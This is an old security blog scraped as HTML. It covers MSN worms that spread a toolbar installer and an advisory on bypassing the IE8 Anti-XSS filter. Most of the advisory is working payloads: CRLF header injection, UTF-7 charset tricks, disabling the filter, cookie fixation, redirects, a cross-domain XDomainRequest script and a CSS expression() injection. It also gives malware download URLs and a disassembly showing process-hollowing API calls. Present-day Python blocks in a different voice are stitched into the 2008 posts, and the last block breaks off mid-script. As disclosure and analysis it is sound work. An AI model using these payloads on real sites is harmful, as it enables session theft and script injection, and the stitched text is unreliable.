signup to see!<br />http://www.date-me-now.com/myprofile.php</blockquote> <p>Which is also registered by WhoisGuard.<br />Both these websites were built to make people download this:<br />http://www.desktopsmiley.com/toolbar/desktopsmiley/download/stb_installer.exe</p> <p>Which they claim is:</p> <blockquote><p>"Download DesktopSmiley to get 1000's of <b>FREE</b> Smileys!<br />It's totally <b>FREE</b>! No Registration. No Spyware."</p></blockquote> <p>Yes, a toolbar advertised by a WORM is not spyware, sure...<br />The example above was version 2.0c. It seems these guys used different methods, different domains and different company names in the older versions (which is typical of viruses and spyware but not of legitimate software).<br />The following example belongs to an older version, 1.1c, with this MSN message:</p><blockquote>foto http://hi5.eu.com/id.php?=[dst_user_email]</blockquote>Which prompts a download of "IMG455.jpg-www.photo.com", an EXE file with a COM extension; when run, the Windows loader detects its true type and executes it as the regular EXE file it is.<br />Those people don't care a bit, and they left "Directory Browsing" open in the subdomain's root; check it out at: http://hi5.eu.com/<br />They even forgot to remove their private packer from the site: http://hi5.eu.com/pa-packer.rar<br /><br />They also have a version at: http://new.upicx.com/ (which I think just went down...)<br />It loads "http://new.upicx.com/indexx.php" and "http://new.upicx.com/pop.php" and verifies that the request's Referer is "http://new.upicx.com/", so a direct request for these files returns "404 Not Found".Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com6tag:blogger.com,1999:blog-9114770521689436630.post-80202508160138916972008-11-24T02:39:00.000-08:002008-12-24T12:47:31.780-08:00Internet Explorer 8.0 
Beta 2 Anti-XSS FilterAspect9: Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities<br /><br />Release Date:<br />November 24, 2008<br /><br />Date Reported:<br />October 5, 2008<br /><br />Severity:<br />Medium-High (Execute scripts, Turning Protection Off, Transfer data Cross<br />Domains)<br /><br />Vendor:<br />Microsoft<br /><br />Systems Affected:<br />Windows Platform with Internet Explorer 8.0 Beta 2<br /><br /><br />Overview:<br />Aspect9 has discovered several vulnerabilities in Microsoft Windows<br />Internet Explorer 8.0 Beta 2. This new version of Microsoft's famous<br />browser includes new security improvements such as a Cross Site Scripting<br />(XSS) filter. This version also includes a new object that is meant to safely allow<br />transferring data across domains, letting them interact with each other.<br /><br />The Anti-XSS filter has been found to have some security holes in the<br />current implementation. Microsoft decided to filter "Type 1 XSS", which is<br />free text sent to the server and reflected back to the user, thereby<br />injecting HTML code into the website's page. They chose not to handle<br />certain situations such as injection into a JavaScript tag space, which<br />would be extremely difficult to filter. The software giant also chose not<br />to filter injection into HTTP headers, which will drive hackers to focus on<br />discovering CRLF vulnerabilities.<br /><br />A quote of Microsoft's Anti-XSS filter design philosophy:<br />[[[<br />"Like all security mitigation and protection technologies, the XSS Filter’s<br />approach does have limitations, being that it is a pragmatic balance<br />between application compatibility, security, and performance.<br /><br />Some examples:<br />* Injection into some contexts is not blocked. 
Ex: Scenarios where content<br />can be injected directly into JavaScript without breaking out of a string.<br /><br />* Injections facilitated by some HTTP headers are not currently blocked.<br />Ex: “Referer” based injection.<br /><br />* If a page contains multiple nearby injection points, attacks can be<br />constructed that thwart the XSS Filter."<br />]]]<br /><br />For more information about the Anti-XSS filter:<br />http://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx<br /><br />In order to understand the contents of this advisory, the reader must be<br />familiar with the concept of CRLF injection, which is distinct from CSRF:<br />http://www.owasp.org/index.php/CRLF_Injection<br />http://www.owasp.org/index.php/CSRF<br /><br /><br /><br />Technical Details:<br /><br />Bypass using CRLF+Encodings:<br />---------------------------------------------<br />Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1<br />XSS" attacks. CRLF injection is also XSS type 1 and is not mitigated by the<br />filter, though the data in the query string will still be filtered.<br />This means that if an attacker tries to exploit a CRLF for XSS in the<br />usual manner, as in this demo:<br />http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A[html][body]<br />[script]alert('get it?')[/script][/body][/html]<br /><br />the attack will fail, as "[script]" is neutered to "[sc#ipt]".<br /><br />However, an attacker can inject a Content-Type header, overwrite the<br />page charset and thereby bypass the XSS filter, which matched the<br />page in its original encoding. 
A good example of this is UTF-7; the following request:<br />http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0d%0aContent-Type: text/html; charset%3dutf-7%0d%0a%0d%0a[html][body]+ADw-script+AD4-alert('owned')+ADw-/script+AD4-[/body][/html]<br /><br />will result in:<br /><br />HTTP/1.1 200 OK<br />Content-Type: text/html; charset=utf-7<br />Server: Microsoft-IIS/6.0<br />Set-Cookie: url=cooki1=value1;<br />X-Powered-By: PleskWin<br />MicrosoftOfficeWebServer: 5.0_Pub<br />X-Powered-By: ASP.NET<br />Date: Sun, 05 Oct 2008 23:46:11 GMT<br />Connection: close<br /><br />[html][body]+ADw-script+AD4-alert('owned')+ADw-/script+AD4-[/body][/html];<br />Content-Type: text/html<br /><br />This will be rendered as UTF-7 and the script will execute.<br /><br /><br /><br />Bypass using CRLF+"X-XSS-Protection":<br />-------------------------------------------------------<br />In addition to the problem of CRLF being able to rewrite the page and<br />bypass the filter using a different encoding than that of the page,<br />Microsoft was kind enough to leave a backdoor, AKA a feature, for developers<br />to turn the filter off. This header is called "X-XSS-Protection" and takes<br />a Boolean value of 0 or 1. By injecting "X-XSS-Protection: 0" through CRLF, an<br />attacker can shut down the XSS protection for that response.<br /><br />Demo:<br />http://www.linkstofiles.com/crlf.py?url=cooki1%3dvalue1;%0d%0aX-XSS-Protection: 0%0d%0a%0d%0a[html][body][script]alert('owned')[/script][/body][/html]<br /><br />Of course the problem extends to any HTTP header that can be used<br />maliciously, like setting cookies and thereby switching the victim to a different user<br />than the one logged on: for example, stealing their cookie and then replacing it<br />with the cookie of a bulk user, thereby taking over their session. 
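The two header injections described above (the charset override and "X-XSS-Protection: 0") as a runnable model. This is an added example and not the advisory's crlf.py: it assumes a server that writes the decoded "url" query parameter straight into a Set-Cookie header, which is what the demo page's responses suggest, and the payloads are constructed to mirror the advisory's requests. It also shows the hardened builder (reject CR/LF before the value reaches a header) and why UTF-7 hides the script tag from anything that inspects the page as ASCII.

```python
# Added example, not the advisory's crlf.py: a minimal model of a server that
# copies the "url" query parameter into a Set-Cookie header. It shows how one
# CR/LF pair in the value splits the response, how an injected Content-Type or
# X-XSS-Protection header lands in the header section, and why a UTF-7 body
# contains no literal "<script" for an ASCII-minded filter to match on.
from urllib.parse import unquote


def build_response_vulnerable(url_param: str) -> bytes:
    """Write the decoded parameter straight into a header (the bug)."""
    value = unquote(url_param)
    return (
        "HTTP/1.1 200 OK\r\n"
        f"Set-Cookie: url={value}\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<html><body>ok</body></html>"
    ).encode("latin-1")


def is_header_safe(value: str) -> bool:
    """A header value must not contain CR, LF or NUL; that is the whole fix."""
    return not any(ch in value for ch in "\r\n\0")


def build_response_safe(url_param: str) -> bytes:
    """Same response, but the value is validated before it becomes a header."""
    value = unquote(url_param)
    if not is_header_safe(value):
        raise ValueError("CR/LF in header value rejected")
    return (
        "HTTP/1.1 200 OK\r\n"
        f"Set-Cookie: url={value}\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<html><body>ok</body></html>"
    ).encode("latin-1")


def parse_response(raw: bytes):
    """Split a raw response as a client does: status line, header map, body.
    Header names are lower-cased; repeated names keep every value, in order."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, *header_lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


# Constructed payloads, one per technique (URL-encoded as they would travel in
# the query string; spaces are left literal for readability).
CRLF = "%0d%0a"
UTF7_PAYLOAD = (
    "cookie1%3dvalue1;" + CRLF + "Content-Type: text/html; charset%3dutf-7"
    + CRLF + CRLF
    + "<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>"
)
XSS_OFF_PAYLOAD = (
    "cookie1%3dvalue1;" + CRLF + "X-XSS-Protection: 0" + CRLF + CRLF
    + "<html><body><script>alert('owned')</script></body></html>"
)


def demo():
    """Return what a client sees for each payload against the vulnerable server."""
    _, hdrs, body = parse_response(build_response_vulnerable(UTF7_PAYLOAD))
    utf7_result = {
        "content_type": hdrs["content-type"],
        # an ASCII view of the body never contains "<script" ...
        "script_tag_visible_as_ascii": b"<script" in body,
        # ... but the browser, told the page is UTF-7, decodes +ADw- to "<"
        "script_tag_after_utf7_decode": "<script>" in body.decode("utf-7"),
    }
    _, hdrs, _ = parse_response(build_response_vulnerable(XSS_OFF_PAYLOAD))
    xss_off_result = {"x_xss_protection": hdrs.get("x-xss-protection")}
    return utf7_result, xss_off_result


if __name__ == "__main__":
    print(demo())
    try:
        build_response_safe(UTF7_PAYLOAD)
    except ValueError as exc:
        print("hardened builder:", exc)
```

Note that the server's own Content-Type header ends up after the injected blank line, inside the body, exactly as in the captured response above; the client only honours the first header section it sees.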
Using the<br />"Location:" header, pages and internal frames/iframes can be redirected to<br />look-alike phishing websites, and so on.<br /><br />Demos:<br />http://www.linkstofiles.com/crlf.py?url=cooki1%3dvalue1;%0d%0aLocation:http://www.micros0ft.com%0d%0a%0d%0a<br /><br />http://www.linkstofiles.com/crlf.py?url=cooki1%3dvalue1;%0d%0aSet-Cookie:sessionid%3dblablablabla_bulk_user_md5_sessionid%0d%0a%0d%0a[html][body]The server is busy, try again in 30 minutes[/body][/html]<br /><br /><br /><br />CRLF+"XDomainRequestAllowed" --] XDomainRequest Enabling:<br />---------------------------------------------------------<br />Having a CRLF injection already gives an attacker the ability to overwrite<br />the HTTP response BODY, which means he can create a new hidden<br />image/frame/form and send data through it, data such as the domain's cookie.<br />But it is clear that overwriting the body using CRLF and making it look the<br />same requires a "fetcher" server-side script on the same domain. Also, a<br />network filter or a WAF may deny injection of a double CRLF (%0d%0a%0d%0a).<br />As time goes by and security evolves, the attacker should have a harder<br />time sending this information out silently.<br /><br />In IE8, there is a new object called "XDomainRequest" which is designed to<br />allow safe data exchange across domains.<br />More information at:<br />http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx<br /><br />The browser will only allow the client (the JavaScript code) to interact<br />with that website if the website returns the "XDomainRequestAllowed"<br />Boolean header.<br /><br />By using CRLF to inject the XDomainRequestAllowed header, an attacker can interact<br />with that website cross-domain without the site's consent, as the consent is<br />faked by the injected header. 
This attack concept on the XDomainRequest<br />in general should be named "XAI" (XDR Allowed Injection).<br /><br />This is a demo request to a CRLF-vulnerable web page:<br />http://www.linkstofiles.com/crlf.py?url=cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1<br /><br />This is how the attacker's script would look:<br />------------------------------------------------<br />[script]<br />try {<br /> // IE8-only object; any other browser throws here and lands in catch<br /> var xdr = new XDomainRequest();<br /> xdr.onload = function() {<br /> // readable only because the injected "XDomainRequestAllowed: 1" header<br /> // made the browser treat the response as permitted cross-domain<br /> alert(xdr.responseText);<br /> };<br /> xdr.open("GET", "http://www.linkstofiles.com/crlf.py?url=cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1");<br /> xdr.send("");<br />} catch (e) {<br /> alert(e.description);<br />}<br />[/script]<br />------------------------------------------------<br />The attacker can now transfer data to/from that domain from other domains with just one<br />header injection: a new, by-design weapon that replaces XSS as a way to leak data.<br />An attacker can use the new feature to interact with web servers (i.e. send and<br />receive data from those domains) by pretending to have the authorization to do so,<br />using a single CRLF header injection.<br />This vulnerability exploits the new feature to enable easy<br />information leakage and cross-domain attacks.<br /><br /><br /><br />UTF-7 websites are not filtered:<br />-------------------------------------------<br />When the page charset is set to UTF-7, whether by the HTTP header or by a<br />meta tag, the Anti-XSS filter does not apply to the page, allowing injected<br />UTF-7 encoded HTML code to execute. 
In other words, UTF-7 content sent<br />to UTF-7 encoded web pages is not filtered, therefore allowing XSS attacks<br />on UTF-7 web pages.<br /><br />I must admit that I have never met a website written in UTF-7 for non-malicious<br />purposes, but it is still a feature, and there are many websites that<br />implement language templates and receive the charset as a parameter from<br />the query string or the cookie.<br /><br />Demos:<br />http://www.linkstofiles.com/xssurlnoparams.py/+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div<br /><br />http://www.linkstofiles.com/xssurlnoparams.py?data=+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div<br /><br /><br />Direct bypass using any double injection:<br />-----------------------------------------<br />A quote from the filter's architecture implementation:<br />[[[<br />"If a page contains multiple nearby injection points, attacks can be<br />constructed that thwart the XSS Filter."<br />]]]<br />Well, that is not accurate.<br /><br />ANY second appearance of the injected data will allow execution of script<br />code. The concept is that data inside tags such as script and style is<br />parsed by its own parser.<br /><br />The CSS (style) parser has 2 characteristics that differentiate it from the<br />script parser:<br />1) It is a silent parser (there is no indication of failure)<br />2) It executes per block, which means that closing<br />a NON-EXISTING (never opened) block will still cause the following<br />blocks to be parsed. 
What does this mean?!?!<br /><br />It means that in the quite common scenario where the same text is injected just twice,<br />at any position inside the page's HTML (except inside textarea/script/style tags,<br />and even those can be handled by putting [/textarea] in a CSS comment),<br />the first injection point<br /><br />} BODY{a:expression(alert('hi'))};[/style]***[style]***<br /><br />opens a style tag, and anything after it is swallowed by a silent CSS<br />parser error; at the second injection:<br /><br />***} BODY{a:expression(alert('hi'))};[/style]***[style]<br /><br />the open style block is closed, so its content, which ends in<br />} BODY{a:expression(alert('hi'))}, is rendered: the stray } closes a never-opened<br />block, the BODY rule that follows is still parsed, and the expression()<br />automatically executes script code! The trailing [style] opens a new block.<br /><br />Demo:<br />http://www.linkstofiles.com/doublexss.py?username=} BODY{a:expression(alert('hi'))};[/style][style]<br /><br /><br />Filter False Positives:<br />-----------------------<br />The following text sent to a page as parameters will trigger a false-positive<br />match by the Anti-XSS filter:<br /><br />["script"]alert('innocent code')[/script]<br />['script']alert('innocent code')[/script]<br />"[[whatever]script]alert('innocent code')[/script]<br /><br />The following should trigger on most CSS design forums with a preview<br />feature:<br />[style]@import[/style]<br />[style]x:y(1)[/style]<br /><br />This means that a CSS tutorial web page cannot send to itself or to another<br />page the following raw text (whether it will be treated as text or as HTML<br />by the receiving page):<br /><br />[style]color:rgb(1,2,3)[/style]<br /><br /><br /><br />Vendor Status:<br />Microsoft's response regarding the CRLF issues:<br />“We will not be led to compromise the XSS Filter’s web site compatibility<br />by attempting to address every conceivable XSS attack scenario.”<br /><br />Microsoft's response regarding the STYLE issue:<br />"We hope we can get a change in prior to IE8 RC1"<br /><br /><br />Credit:<br />Rafel Ivgi<br /><br /><br 
/>Greetings:<br />David Ross, the_pull, Liu Die Yu, Arkon, JonD, lorgandon, xbxice, Budo, Reiter,<br />Inga, Lucid, h.p.c, Dror Shalev, wir3less, Zull, 0fir0, dbrod, ax1les,<br />whitehawkofjustice<br /><br /><br />Disclaimer<br />The information within this paper may change without notice.<br />Use of this information constitutes acceptance for use in an<br />AS IS condition. There are no warranties, implied or express,<br />with regard to this information. In no event shall the author<br />be liable for any direct or indirect damages whatsoever<br />arising out of or in connection with the use or spread of<br />this information. Any use of this information is at the<br />user's own risk.Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-82239734385043223482008-11-12T13:37:00.000-08:002008-11-12T17:14:01.001-08:00A new MSN WormAre viruses attracted to me specifically, or does it happen to everyone and they just don't notice or say nothing about it? It's getting really hard to talk to people over instant messengers and be sure it is them sending you a message and not a virus.<br /><br />Before I begin, let's note a few related viruses :)<br />This: http://www.cisrt.org/enblog/read.php?106<br />is a different, older one from July. Reported, and still not fully detected by vendors.<br /><br />Now for the painful part, this:<br />http://blog.threatfire.com/2008/06/msn-im-worm.html<br />a slightly older variant that was covered in June!!! That is 5 months ago!! The detection rates were nasty, and they still are, as you will see below...<br />The point I don't get is why AV vendors don't take care of the missed detections at least AFTER some security researcher publishes an analysis?!<br /><br />I got a message from a friend who is currently on a trip in Thailand, and I was amazed to see that his computer sent me a message with a link containing my MSN email address. 
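Before following such a link, the check I would run on whatever it serves. This is an added example and not the post's own tooling: a small sniffer of the kind of "true type" detection this blog relies on (WinRAR recognising a self-extractor regardless of its name, the Windows loader running a PE whatever its extension says). It classifies a file by its leading bytes, flags a PE that carries a cabinet inside, and flags names that pretend to be images. The byte samples are constructed stand-ins, not the worm's binaries; the two file names are the ones quoted in this blog.

```python
# Added example, not the post's tooling: content-based type detection of the
# kind WinRAR and the Windows loader do, plus a check of the file name for the
# image-lookalike trick. The PE/JPEG/CAB bytes below are constructed stand-ins.
import os
import re
import struct

DOS_MAGIC = b"MZ"
PE_MAGIC = b"PE\0\0"
CAB_MAGIC = b"MSCF"          # Microsoft Cabinet; a wextract-style SFX embeds one
JPEG_MAGIC = b"\xff\xd8\xff"
# an image extension anywhere in the name that is not the real extension
IMAGE_EXT_RE = re.compile(r"\.(jpe?g|gif|png|bmp)(?![a-z0-9])", re.I)


def sniff(data: bytes) -> str:
    """Classify by content only; the file name is never consulted."""
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    if data.startswith(CAB_MAGIC):
        return "cab"
    if data.startswith(DOS_MAGIC) and len(data) >= 0x40:
        # e_lfanew at offset 0x3c points at the PE signature
        pe_off = struct.unpack_from("<I", data, 0x3C)[0]
        if data[pe_off:pe_off + 4] == PE_MAGIC:
            # heuristic: an embedded cabinet marks a self-extracting dropper
            return "pe+cab" if CAB_MAGIC in data else "pe"
        return "dos"
    return "unknown"


def analyse(name: str, data: bytes) -> dict:
    """Compare what the name claims with what the bytes are."""
    stem, ext = os.path.splitext(os.path.basename(name))
    ext = ext.lower()
    real = sniff(data)
    is_exe = real.startswith("pe")
    lookalike = bool(IMAGE_EXT_RE.search(stem))
    return {
        "claimed": ext,
        "real": real,
        "image_lookalike": lookalike,
        # executable content behind a non-.exe name, or an .exe dressed as a picture
        "suspicious": is_exe and (ext != ".exe" or lookalike),
    }


def make_fake_pe(with_cab: bool = False) -> bytes:
    """Constructed stand-in for an executable: a DOS header whose e_lfanew points
    at a PE signature, optionally followed by a cabinet magic. Not runnable."""
    hdr = bytearray(0x80)
    hdr[:2] = DOS_MAGIC
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    body = bytes(hdr) + PE_MAGIC + b"\0" * 0x100
    if with_cab:
        body += CAB_MAGIC + b"\0" * 32
    return body


def make_fake_jpeg() -> bytes:
    """Constructed JPEG header (SOI + APP0 marker) followed by padding."""
    return JPEG_MAGIC + b"\xe0" + b"\0" * 16


if __name__ == "__main__":
    for name, data in (
        ("virus-PIC006.JPG-www.myspace.exe", make_fake_pe(with_cab=True)),
        ("IMG455.jpg-www.photo.com", make_fake_pe()),
        ("holiday.jpg", make_fake_jpeg()),
    ):
        print(name, analyse(name, data))
```

On a real sample, read the first few kilobytes of the downloaded file into `data`; the cabinet search is a heuristic (a packed or encrypted stub hides the MSCF signature), so treat "pe" with an image-looking name as just as suspicious as "pe+cab".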
I clicked the link and a file download prompt popped up; the file name was "virus-PIC006.JPG-www.myspace.exe".<br />Well, as tired as I may be, I would never be THAT tired as to execute it :)<br /><br />So I saved it and started to analyze!<br />Well, what is it? It is a self-extracting CAB archive (almost original :) with resource details spoofed to look like a Microsoft file! (It even looks like it was edited manually using a tool such as Resource Hacker.)<br />File Version: "6.0.2900.2180"<br />Description: "Win32 Cabinet Self-Extractor " (maybe they thought we wouldn't notice the spaces :)<br />Company: "Microsoft Corporation"<br />File Version: "6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)"<br />Internal Name: "Wextract "<br />Language: "English (United States)"<br />Original File name: "WEXTRACT.EXE "<br />Product Name: "Microsoft® Windows® Operating System"<br />Product Version: "6.00.2900.2180"<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtS-CC2kzI/AAAAAAAAADM/gAVvXKOzxEY/s1600-h/description.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 289px; height: 400px;" src="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtS-CC2kzI/AAAAAAAAADM/gAVvXKOzxEY/s400/description.JPG" alt="" id="BLOGGER_PHOTO_ID_5267895414794130226" border="0" /></a><br /><br />Once again it seems that WinRAR is more effective than an anti-virus: it detects the file as a self-extracting archive, so I know it's no simple EXE:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtTJRKtzrI/AAAAAAAAADU/J0FO4DHVuGo/s1600-h/sfx.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 290px; height: 400px;" 
src="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtTJRKtzrI/AAAAAAAAADU/J0FO4DHVuGo/s400/sfx.JPG" alt="" id="BLOGGER_PHOTO_ID_5267895607832202930" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />The funniest think about this "trap file" is that it has double extension of .jpg...........exe that comes with the default icon of a jpeg file<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtYqK0ai3I/AAAAAAAAADk/vkeUM2H00_o/s1600-h/jpgicon.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 78px; height: 90px;" src="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtYqK0ai3I/AAAAAAAAADk/vkeUM2H00_o/s400/jpgicon.JPG" alt="" id="BLOGGER_PHOTO_ID_5267901670621875058" border="0" /></a><br /><br /><br /><br /><br /><br />BUT when you switch to DETAILS view in the browser, then you see its 16x16 icon which is a setup icon:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_18YBLFP2tdA/SRtY5ucPIHI/AAAAAAAAADs/cNXTfJG4Alg/s1600-h/setupicon.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 15px;" src="http://3.bp.blogspot.com/_18YBLFP2tdA/SRtY5ucPIHI/AAAAAAAAADs/cNXTfJG4Alg/s400/setupicon.JPG" alt="" id="BLOGGER_PHOTO_ID_5267901937882177650" border="0" /></a><br /><br />Dear bad guys! 
use some of that money you steal to do some Q&amp;A for your bot droppers!<br />O.K let's see if our friends know it:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_18YBLFP2tdA/SRtVc5VVc1I/AAAAAAAAADc/rlfvZvy3OjU/s1600-h/avs1.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 244px; height: 400px;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SRtVc5VVc1I/AAAAAAAAADc/rlfvZvy3OjU/s400/avs1.JPG" alt="" id="BLOGGER_PHOTO_ID_5267898144054932306" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />9 of 36...wow!<br />Could it be that Symantec, Mcafee, Kaspersky, F-Secure, Panda, Sophos all the great brands does not even suspect it?! and that Microsoft which is quite new in the AV business catches it?! I want to point out <span style="font-weight: bold;">Dr. Web</span> again for being<span style="font-weight: bold;"> a good detector</span>(comparing to the concept of an Anti-Something) as Kaspersky once were, before they went to enterprise and from tech to GUI (if i was kaspersky, i would by dr web...just a thought)<br /><br />So we extract the sfx and we get a file called test.exe with a jpg icon, this time it's not an archive, here comes the real shame, it is not even packed!!!<br />Let's see if our friends know it:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_18YBLFP2tdA/SRt26eiEuuI/AAAAAAAAAD0/zySBHZLN4kY/s1600-h/avs2.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 246px; height: 400px;" src="http://3.bp.blogspot.com/_18YBLFP2tdA/SRt26eiEuuI/AAAAAAAAAD0/zySBHZLN4kY/s400/avs2.JPG" alt="" id="BLOGGER_PHOTO_ID_5267934936140397282" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br 
/><br />it is just a simple VC++ executable that uses dynamic function calls with the simplest use of a rolling xor running on the string "somenigz', quite amusing :)<br /><br />.text:0040122E mov [ebp+var_340], 0<br />.text:00401238 push offset Source ; "¦âöÉàöíâPÆöéé¦"<br />.text:0040123D call sub_401000<br />.text:00401242 add esp, 4<br />.text:00401245 push eax ; lpProcName<br />.text:00401246 push offset aFgqfaXaa ; "Üöâƒö¥-+¯ò¥¥"<br />.text:0040124B call sub_401000<br />.text:00401250 add esp, 4<br />.text:00401253 push eax ; lpModuleName<br />.text:00401254 call ds:GetModuleHandleA<br />.text:0040125A push eax ; hModule<br />.text:0040125B call ds:GetProcAddress<br /><br />You can see these letters "Üöâƒö¥-+¯ò¥¥" which are clearly XORed sent to a function, the classic "decrypt my dll name and then the function in it and call it". Of course "sub_401000" is the decrypt function:<br /><br />.text:0040105D Rolling_Xor_Loop: ; CODE XREF: sub_401000+85 j<br />.text:0040105D mov edx, [ebp+var_C]<br />.text:00401060 add edx, 1<br />.text:00401063 mov [ebp+var_C], edx<br />.text:00401066<br />.text:00401066 loc_401066: ; CODE XREF: sub_401000+5B j<br />.text:00401066 cmp [ebp+var_C], 9<br />.text:0040106A jnb short loc_401087<br />.text:0040106C mov eax, [ebp+Str]<br />.text:0040106F add eax, [ebp+var_8]<br />.text:00401072 mov ecx, [ebp+var_C]<br />.text:00401075 mov dl, [eax]<br />.text:00401077 xor dl, byte ptr aSomenigz[ecx] ; "somenigz"<br />.text:0040107D mov eax, [ebp+Str]<br />.text:00401080 add eax, [ebp+var_8]<br />.text:00401083 mov [eax], dl<br />.text:00401085 jmp short Rolling_Xor_Loop<br /><br />Decoded XORed strings, by order, are:<br />CreateProcessA<br />kernel32.dll<br />NtUnmapViewOfSection<br />ntdll.dll<br />VirtualAllocEx<br />kernel32.dll<br />WriteProcessMemory<br />kernel32.dll<br />GetThreadContext<br />kernel32.dll<br />SetThreadContext<br />kernel32.dll<br />ResumeThread<br /><br />This shows us this was not written by simple kids! 
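Here is how an analyst recovers obfuscated names like the ones above in practice. This is an added example; it is not code from the post and not the sample's own routine. The listing XORs a single string byte with key[var_C] for every var_C below 9 (the eight letters of "somenigz" plus its NUL terminator); if var_C restarts at 0 for each string position, those nine XORs fold into one constant, so the "rolling" XOR behaves like a plain single-byte XOR. The listing itself hints at that: in "Üöâƒö¥-+¯ò¥¥" the same byte "ö" sits where kernel32.dll has both of its "e"s, and "¥¥" sits where it has "ll". The ciphertext the code works on is constructed here by re-encoding the decoded names with an assumed key byte (0xF1, a demo value, not a constant taken from the binary), and the recovery step brute-forces all 256 single-byte keys instead of relying on knowing "somenigz".

```python
# Added example (not the post's code and not the sample's): recovering
# XOR-obfuscated API and module names like the ones in the listing above.
# The ciphertext is constructed here by re-encoding the names the post
# lists; KEY_BYTE is an assumed value for this demo, not a constant taken
# from the binary.
from typing import Dict, List, Tuple

# The nine-byte buffer the loop indexes: "somenigz" plus its NUL terminator
# (the loop runs while var_C < 9).
KEY_BUFFER = b"somenigz\x00"

# Assumed single-byte key for the constructed sample.
KEY_BYTE = 0xF1

# The names the post recovered, in the order it lists them.
DECODED_NAMES = [
    "CreateProcessA", "kernel32.dll", "NtUnmapViewOfSection", "ntdll.dll",
    "VirtualAllocEx", "kernel32.dll", "WriteProcessMemory", "kernel32.dll",
    "GetThreadContext", "kernel32.dll", "SetThreadContext", "kernel32.dll",
    "ResumeThread",
]

# Characters that may appear in a Win32 export or module name.
NAME_CHARS = frozenset(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._"
)


def fold_key(key: bytes) -> int:
    """XOR all key bytes into one constant.

    The listing XORs a single string byte with key[var_C] for every var_C
    below 9.  If var_C restarts at 0 for each position, those nine XORs are
    equivalent to one XOR with this constant, so the "rolling" XOR is really
    a fixed single-byte XOR and can be brute-forced blind.
    """
    acc = 0
    for b in key:
        acc ^= b
    return acc


def xor_with(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; encoding and decoding are the same."""
    return bytes(b ^ key for b in data)


def decode_like_listing(data: bytes, key: bytes = KEY_BUFFER) -> bytes:
    """Reproduce the loop literally: XOR each byte with every key byte in turn."""
    out = bytearray(data)
    for i in range(len(out)):
        for k in key:
            out[i] ^= k
    return bytes(out)


def rank_keys(blob: bytes) -> List[Tuple[int, int]]:
    """Try all 256 single-byte keys and rank them by how many decoded bytes
    look like name characters.  Returns (key, score) pairs, best first."""
    scored = [
        (k, sum(1 for b in xor_with(blob, k) if b in NAME_CHARS))
        for k in range(256)
    ]
    scored.sort(key=lambda ks: (-ks[1], ks[0]))
    return scored


def recover_names(blobs: List[bytes]) -> Dict[str, object]:
    """Recover the key from all ciphertext at once (more bytes, fewer false
    candidates), then decode every string with it.  'ambiguous' is set when
    a second key scores just as well, i.e. the input is too short to decide."""
    ranked = rank_keys(b"".join(blobs))
    best_key, best_score = ranked[0]
    ambiguous = ranked[1][1] == best_score
    names = [xor_with(b, best_key).decode("ascii", errors="replace") for b in blobs]
    return {"key": best_key, "ambiguous": ambiguous, "names": names}


def constructed_sample() -> List[bytes]:
    """Constructed ciphertext: the listed names encoded with KEY_BYTE."""
    return [xor_with(n.encode("ascii"), KEY_BYTE) for n in DECODED_NAMES]


if __name__ == "__main__":
    blobs = constructed_sample()
    result = recover_names(blobs)
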